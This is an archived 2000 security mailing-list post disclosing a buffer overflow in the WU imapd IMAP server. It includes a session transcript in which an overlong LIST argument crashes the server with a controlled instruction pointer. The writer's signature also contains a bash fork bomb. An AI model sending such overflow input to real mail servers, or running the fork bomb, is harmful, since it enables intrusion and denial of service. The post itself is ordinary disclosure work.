Related information

Переполнение буфера в WU-IMAPD

another WU imapd buffer overflow

Re: another WU imapd buffer overflow

From:	Michal Zalewski <lcamtuf_(at)_TPI.PL>
Date:	17.04.2000
Subject:	imapd4r1 v12.264

Newest RH:

* OK nimue IMAP4rev1 v12.264 server ready
1 login lcamtuf test
1 OK LOGIN completed
1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

*sigh*

Privledges seems to be dropped, but, anyway, it's nice way to get shell
access to mail account, maybe grab some data from memory etc. I believe
both imap and ipopd packages need code security audit.

_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=




===========================================================================
List przyszedі z listy <secure@mud.pl>